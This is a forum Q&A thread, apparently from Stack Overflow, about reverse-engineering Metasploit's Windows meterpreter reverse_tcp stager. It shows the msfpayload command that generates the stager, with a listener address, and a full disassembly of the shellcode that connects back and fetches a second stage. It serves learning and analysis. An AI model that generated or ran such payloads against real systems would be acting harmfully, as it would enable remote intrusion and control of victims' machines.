Understanding metasploits meterpreter payload

Question

I would like to get more in-depth knowledge of how the meterpreter works. If you disassemble the payload windows/meterpreter/reverse_typ, created by msfpayload with the following commands:

$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 R > raw_binary
$ /.../metasploit/lib/metasm/samples/disassemble.rb raw_binary > asm_code.asm

You'll get the following result:

$ cat asm_code.asm
entrypoint_0:
    cld                                          ; @0  fc  
    call sub_8fh                                 ; @1  e889000000  x:sub_8fh
    pushad                                       ; @6  60  
    mov ebp, esp                                 ; @7  89e5  
    xor edx, edx                                 ; @9  31d2  
    mov edx, fs:[edx+30h]                        ; @0bh  648b5230  r4:segment_base_fs+30h
    mov edx, [edx+0ch]                           ; @0fh  8b520c  r4:unknown
    mov edx, [edx+14h]                           ; @12h  8b5214  r4:unknown


// Xrefs: 8dh
loc_15h:
    mov esi, [edx+28h]                           ; @15h  8b7228  r4:unknown
    movzx ecx, word ptr [edx+26h]                ; @18h  0fb74a26  r2:unknown
    xor edi, edi                                 ; @1ch  31ff  


// Xrefs: 2ch
loc_1eh:
    xor eax, eax                                 ; @1eh  31c0  
    lodsb                                        ; @20h  ac  
    cmp al, 61h                                  ; @21h  3c61  
    jl loc_27h                                   ; @23h  7c02  x:loc_27h

    sub al, 20h                                  ; @25h  2c20  


// Xrefs: 23h
loc_27h:
    ror edi, 0dh                                 ; @27h  c1cf0d  
    add edi, eax                                 ; @2ah  01c7  
    loop loc_1eh                                 ; @2ch  e2f0  x:loc_1eh

    push edx                                     ; @2eh  52  
    push edi                                     ; @2fh  57  
    mov edx, [edx+10h]                           ; @30h  8b5210  r4:unknown
    mov eax, [edx+3ch]                           ; @33h  8b423c  
    add eax, edx                                 ; @36h  01d0  
    mov eax, [eax+78h]                           ; @38h  8b4078  
    test eax, eax                                ; @3bh  85c0  
    jz loc_89h                                   ; @3dh  744a  x:loc_89h

    add eax, edx                                 ; @3fh  01d0  
    push eax                                     ; @41h  50  
    mov ecx, [eax+18h]                           ; @42h  8b4818  
    mov ebx, [eax+20h]                           ; @45h  8b5820  
    add ebx, edx                                 ; @48h  01d3  


// Xrefs: 66h
loc_4ah:
    jecxz loc_88h                                ; @4ah  e33c  x:loc_88h

    dec ecx                                      ; @4ch  49  
    mov esi, [ebx+4*ecx]                         ; @4dh  8b348b  
    add esi, edx                                 ; @50h  01d6  
    xor edi, edi                                 ; @52h  31ff  


// Xrefs: 5eh
loc_54h:
    xor eax, eax                                 ; @54h  31c0  
    lodsb                                        ; @56h  ac  
    ror edi, 0dh                                 ; @57h  c1cf0d  
    add edi, eax                                 ; @5ah  01c7  
    cmp al, ah                                   ; @5ch  38e0  
    jnz loc_54h                                  ; @5eh  75f4  x:loc_54h

    add edi, [ebp-8]                             ; @60h  037df8  
    cmp edi, [ebp+24h]                           ; @63h  3b7d24  
    jnz loc_4ah                                  ; @66h  75e2  x:loc_4ah

    pop eax                                      ; @68h  58  
    mov ebx, [eax+24h]                           ; @69h  8b5824  
    add ebx, edx                                 ; @6ch  01d3  
    mov cx, [ebx+2*ecx]                          ; @6eh  668b0c4b  
    mov ebx, [eax+1ch]                           ; @72h  8b581c  
    add ebx, edx                                 ; @75h  01d3  
    mov eax, [ebx+4*ecx]                         ; @77h  8b048b  
    add eax, edx                                 ; @7ah  01d0  
    mov [esp+24h], eax                           ; @7ch  89442424  
    pop ebx                                      ; @80h  5b  
    pop ebx                                      ; @81h  5b  
    popad                                        ; @82h  61  
    pop ecx                                      ; @83h  59  
    pop edx                                      ; @84h  5a  
    push ecx                                     ; @85h  51  
    jmp eax                                      ; @86h  ffe0  


// Xrefs: 4ah
loc_88h:
    pop eax                                      ; @88h  58  


// Xrefs: 3dh
loc_89h:
    pop edi                                      ; @89h  5f  
    pop edx                                      ; @8ah  5a  
    mov edx, [edx]                               ; @8bh  8b12  r4:unknown
    jmp loc_15h                                  ; @8dh  eb86  x:loc_15h


// Xrefs: 1
sub_8fh:
// function binding: ebp -> dword ptr [esp], esp -> esp-10h
// function ends at 0a0h
    pop ebp                                      ; @8fh  5d  
    push 3233h                                   ; @90h  6833320000  
    push 5f327377h                               ; @95h  687773325f  
    push esp                                     ; @9ah  54  
    push 726774ch                                ; @9bh  684c772607  
    call ebp                                     ; @0a0h  ffd5  endsub sub_8fh noreturn
db 0b8h, 90h, 1, 0, 0, 29h, 0c4h, "TPh)", 80h, 6bh, 0 ; @0a2h
db 0ffh, 0d5h, "PPPP@P@Ph", 0eah, 0fh, 0dfh, 0e0h, 0ffh ; @0b0h
db 0d5h, 97h, 6ah, 5, 68h, 0c0h, 0a8h, 1, 64h, 68h, 2, 0, 1, 0bbh, 89h, 0e6h ; @0c0h
db 6ah, 10h, "VWh", 99h, 0a5h, 74h, 61h, 0ffh, 0d5h, 85h, 0c0h, 74h, 0ch, 0ffh ; @0d0h
db 4eh, 8, 75h, 0ech, 68h, 0f0h, 0b5h, 0a2h, 56h, 0ffh, 0d5h, 6ah, 0, 6ah, 4, 56h ; @0e0h
db 57h, 68h, 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 8bh, "6j@h", 0, 10h, 0 ; @0f0h
db 0, 56h, 6ah, 0, 68h, 58h, 0a4h, 53h, 0e5h, 0ffh, 0d5h, 93h, 53h, 6ah, 0, 56h ; @100h
db "SWh", 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 1, 0c3h, 29h, 0c6h, 85h, 0f6h, 75h ; @110h
db 0ech, 0c3h                                    ; @120h

How can I get a better understanding of what this code means? I would like to understand how the meterpreter payload works really, but I don't know where to start, unfortunately.

I started by looking at the code with IDA, but that did not bring me much further.

Any links or resources for reading and further studying are appreciated!

It's hard to tell what's going on without knowing the context in which this code will execute and possibly some intimate details of the application and OS. It appears that there is some online documentation about meterpreter. It may be worthwhile to read it to have the big picture in mind. — Alexey Frunze, Feb 27 '12 at 07:51
I've dived into this already. Well, what we know its that it should be compiled for windows x86 — Erik, Feb 27 '12 at 08:19

score 3 · Answer 1 · answered Mar 07 '12 at 03:48

This is really just the stub for the reverse_tcp stager. The source assembly can be found in /opt/metasploit-*/msf3/external/source/shellcode/windows/stager_reverse_tcp.asm (or on github). The meterpreter code itself is not in the payload generated by msfpayload, since it is downloaded ('staged') by the reverse_tcp stager (or whatever other stager you choose to use). The meterpreter source is mostly C, not assembly, since it doesn't have to be shellcode.

Understanding metasploits meterpreter payload

1 Answers1